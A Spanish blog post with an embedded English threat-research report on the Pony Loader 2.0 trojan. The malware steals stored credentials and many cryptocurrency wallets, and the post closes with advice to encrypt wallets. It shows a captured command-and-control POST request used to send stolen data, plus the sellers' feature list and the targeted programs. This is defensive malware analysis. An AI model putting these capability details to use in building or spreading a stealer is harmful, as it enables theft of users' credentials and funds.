martes, 1 de julio de 2014

Alerta de virus en Wallets

Pony Loader 2.0 roba billeteras virtuales como Bitcoin y Litecoin

El troyano conocido como Pony o Fareit fue rediseñado: después de que su código fuente se pusiera a la venta, Pony Loader 2.0 roba credenciales de diversas billeteras virtuales y las envía a un servidor remoto.

 Hace poco tiempo, este troyano que también se ha utilizado para propagar Zeus y Cryptolocker, fue rediseñado para robar billeteras virtuales. Esto no es del todo sorprendente si tenemos en cuenta que el código fuente de Pony Loader 2.0 había sido puesto en venta en mayo de este año.
Las billeteras que esta amenaza tiene como blanco incluyen a Bitcoin, Litecoin, MultiBit, Namecoin, Terracoin, Primecoin, Feathercoin, NovaCoin, MegaCoin, Digitalcoin, Zetacoin, Fastcoin, Tagcoin, Bytecoin, Florincoin, and Luckycoin, y muchas otras figuran en el listado publicado por investigadores de seguridad de Damballa.
Pony Loader 2.0 mantiene su capacidad para robar contraseñas y propagar otros tipos de malware, y contiene una lista de palabras que se utilizan para ejecutar ataques de fuerza bruta en cuentas de usuarios, según la publicación de Damballa. Estas palabras fueron tomadas de listados publicados anteriormente después de ataques a diversos servicios, y se agregaron las siguientes:
Se cree que los comerciantes del código malicioso son de Rusia, y que están ofreciendo funcionalidades adicionales relacionadas a mejoras en la recolección de credenciales.
El troyano puede infectar a los usuarios a través de enlaces maliciosos en correos electrónicos o exploit kits, por lo que les recomendamos estar alertas para no caer víctimas de esta amenaza. La recomendación de Bitcoin es actualizar a las versiones más recientes del cliente, que incorporan un sistema para cifrar con contraseña las claves privadas contenidas en el monedero.

Pony Loader 2.0 Steals Credentials and Bitcoin Wallets: Source Code for Sale

Pony Loader malware has been around for years. The source code for version 1.9 was leaked on the Internet, giving criminals the opportunity to modify it to their liking. Recently, Damballa’s Threat Research team observed Pony Loader version 2.0. This variant, which ups the potential payday for criminals, is also up for sale.
On May 28, 2014, the Damballa Threat Research team obtained an unknown malware sample for analysis. After performing an initial analysis, we observed HTTP traffic to the domain 602ef0b0[.]pw, which was hosted at CloudFlare global CDN (content delivery network). CloudFlare is a legitimate network used to ensure the availability and security of websites. Malware authors commonly attempt to host their malware using known, trusted infrastructure in an effort to avoid detection and make their traffic more difficult to identify and block.
Pony Loader, also referred to as Fareit, has been used over the past several years and has the ability to steal sensitive information from a victim’s computer and install additional malware. This may include stored credentials for email, web and FTP accounts. In the past, Pony has been used to distribute the P2P Gameover Zeus Trojan.
The Pony source code has been leaked on the Internet (version 1.9), which allows anyone to obtain the source and modify it for use in an attack campaign. Upon execution of this binary, we observed the following HTTP POST request sent to the command and control server:
POST /llfrty.php HTTP/1.0
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 375
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
InfoPath.2; .NET CLR 2.0.50727)
……..CD….=l….+._i`.l.%…….o#.`.MW.l.o.2. %x.I…-..m……….>..;.n..Q..:.9…*…3b……a”8V.S…

After identifying this malware as Pony / Fareit, we posted some initial information to a security mailing list. CloudFlare analysts were able to identify and suspend the account, preventing future C2 communications at the listed domain.
piny-loader-blogThis version of Pony is not just the old dropper and credential stealer that has been seen with version 1.9.  This Pony Loader sample had been updated to steal a victim's bitcoin wallet as well.  This particular version is being sold on the criminal market as Pony Loader version 2.0.
This version was listed for sale in May 2014.  However, Pony Loader 2.0 has been circulating on the Internet since early 2014.  Now that the source is listed for sale, Damballa Researchers expect to see an increase in this type of bitcoin stealing malware with customized capabilities.
Pony Loader 1.9 contains a wordlist used to brute-force user accounts on a victim's computer that is also present in version 2.0. The attackers obtained the password list from some of the top passwords associated with several database hacks.  The password list was obtained from:
Several passwords were added to this list:
The wordlist is used to enumerate local passwords with the LogonUserA Windows API call.
The criminals attempting to sell the source code for Pony 2.0 advertise the bitcoin programs that are targeted in the updated version.  Damballa has verified the following list of bitcoin software in Pony version 2.0:
Electrum, MultiBit, Litecoin, Namecoin, Terracoin, Bitcoin Armory, PPCoin (Peercoin), Primecoin, Feathercoin, NovaCoin, Freicoin, Devcoin, Frankocoin, ProtoShares, MegaCoin, Quarkcoin, Worldcoin, Infinitecoin, Ixcoin, Anoncoin, BBQcoin, Digitalcoin, Mincoin, Goldcoin, Yacoin, Zetacoin, Fastcoin, I0coin, Tagcoin, Bytecoin, Florincoin, Phoenixcoin, Luckycoin, Craftcoin, Junkcoin and the original Bitcoin client.
In addition, the sellers are marketing additional features and 'upgrades' as follows - Russian to English translation:
[+] Implemented collection of Ya.Browser passwords, FTP Disk, new versions of Opera (code-based Chrome)
[*] When the program on behalf of the user SYSTEM (service Windows) will now run the loader file as an active session (logged on) Users
[*] Improved collect passwords Firefox, is no longer dependent on the availability of libraries SQLite3
[+] Optional redundant bootloader mode: if successfully loaded the first file – the rest will be skipped
[+] Added option to disable the collection of passwords (just leave the loader)
[-] Fixed processing SQLite3 files for Chrome / Firefox containing 48 bit integers
[-] Fixed a serious bug in several functions, which could lead to errors in the collection of passwords and reach program
Implemented instantaneous decoding of saved passwords for the following programs:
FAR ManagerFTPGetterPocomail
Total CommanderALFTPIncrediMail
WS_FTPInternet ExplorerThe Bat!
FileZillaGoogle ChromeFastTrackFTP
FTP CommanderChromium / SRWare IronBitcoin
BulletProof FTPChromePlusElectrum
SmartFTPBromium (Yandex Chrome)MultiBit
TurboFTPNichromeFTP Disk
FFFTPComodo DragonLitecoin
CoffeeCup FTP / SitemapperRockMeltNamecoin
FTP ExplorerEpicBitcoin Armory
Frigate3 FTPStaff-FTPPPCoin (Peercoin)
UltraFXPGlobal DownloaderFeathercoin
FlingEasy FTPMegaCoin
Directory OpusFTP NowWorldcoin
FreeFTP / DirectFTPRobo-FTPInfinitecoin
32bit FTPPuttyBBQcoin
NetDriveNotepad + +Digitalcoin
WebDriveCoffeeCup Visual Site DesignerMincoin
FTP ControlFTPShellGoldcoin
FTP VoyagerFastStone BrowserFastcoin
SeaMonkeyYandex.Internet / Ya.BrowserBytecoin
Mozillasherrod FTPPhoenixcoin
Odin Secure FTP ExpertWindows MailCraftcoin
WinFTPWindows Live MailJunkcoin
FTP SurferBecky!
See original postings on here:
The builder is still being marketed with the source code and makes creating the virus possible using only a few mouse clicks:
Damballa Threat Researchers are continuing to investigate the use of this malware on the Internet. Given the capability to steal stored credentials from a wide variety of software, users should consider storing their passwords and bitcoin private keys using these programs risky.
“Your wallet.dat file is not encrypted by the Bitcoin program by default but the most current release of the Bitcoin client provides a method to encrypt with a passphrase the private keys stored in the wallet. Anyone who can access an unencrypted wallet can easily steal all of your coins. Use one of these encryption programs if there is any chance someone might gain access to your wallet.” –
143c9261b19118863882a2e9793d0840 – MD5 hash – Domain
– Isaac Palmer,
     Malware Reverse Engineer

BTC:  1Eb6A6M3iH3eyX5Q7DVnvDWBLAmjKi3ae5

No hay comentarios:

Publicar un comentario